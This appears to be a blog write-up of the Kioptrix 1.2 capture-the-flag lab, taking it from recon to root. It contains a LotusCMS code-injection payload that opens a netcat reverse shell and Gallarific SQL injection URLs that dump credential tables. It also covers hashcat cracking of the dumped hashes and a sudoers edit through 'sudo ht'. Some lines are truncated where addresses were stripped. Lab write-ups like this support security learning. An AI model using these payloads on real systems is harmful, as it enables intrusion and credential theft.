Kioptrix 1.2 (#3)


According to description supplied by author himself:


After booting up the machine I had to find out what IP it was given by DHCP. In order to do that I ran a ping sweep over entire subnetwork using nmap.

# nmap -sP -n
-- snip --
Nmap scan report for
Host is up (0.00029s latency).
MAC Address: 00:0C:29:05:D6:2E (VMware)
-- snip --
# echo >> /etc/hosts
# nmap -sT -sV -O
-- snip --
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
-- snip --

Low privlege shell

Low privleges can be acquired in more than one way. So far, I found two ways:

Lotus CMS Remote Code Execution

Starting looks like some kind of cms or blog engine. Indeed, login page confirms it is a LotusCMS.

LotusCMS login page
index');${system('nc -e /bin/sh 443')};#
Reverse shell
$GLOBALS["gallarific_path"] = "";$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
# python -c 'import pty; pty.spawn("/bin/sh")'
# mysql -uroot -p
Enter password: fuckeyou
-- snip --
mysql> show databases;
| Database |
| information_schema |
| gallery |
| mysql |
3 rows in set (0.00 sec)
mysql> use gallery;
-- snip --
Database changed
mysql> show tables;
| Tables_in_gallery |
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
7 rows in set (0.01 sec)
mysql> SELECT * FROM dev_accounts;
| id | username | password |
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
2 rows in set (0.00 sec)

Gallarific SQL Injection

There is also a way of obtaining this information without actual shell. In the Gallarific application I found a SQL Injection vulnerability by adding an apostrophe character to ID parameter:
SQL error after inserting apostrophe to parameter,2,3,4,5,6%20--&sort=photoid#photos
UNION’d values visible on the site,2,GROUP_CONCAT(table_name),4,5,6%20FROM%20information_schema.tables%20WHERE%20table_schema=database()--&sort=photoid#photos
List of tables from the server,2,group_concat(column_name),4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name=%27dev_accounts%27%20--&sort=photoid#photos
Dev_accounts column,username,password,4,5,6%20FROM%20dev_accounts%20--&sort=photoid#photos
Credentials listed

Privlege escalation

Credentials reversal

No matter how we obtained the credentials in the previous step, we need to reverse the password hash. I pasted those hashes to a hashes.txt file on attackers machine and used hashcat to crack them:

# hashcat64.exe -m0 -a 0 hashes.txt rockyou.txt
-- snip --
-- snip --
# ssh
-- snip --'s password: starwars
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

Escalating privleges

On the victim machine I checked the /home dir. There is an interesting txt file in loneferret’s folder:

# cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
Opening file
loneferret ALL=(ALL) ALL
Modified /etc/sudoers
loneferret@Kioptrix3:~$ sudo bash
[sudo] password for loneferret: starwars
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# cd /root
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18


That’s it! We’ve rooted Kioptrix 1.2 ;) Even though the challenge required more steps than previous ones in the series, it was still quite easy. For me the biggest challenge was to learn how to use the ht application. The hack itself was quite straightforward. Bear in mind though that difficulty is very subjective with those :)



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store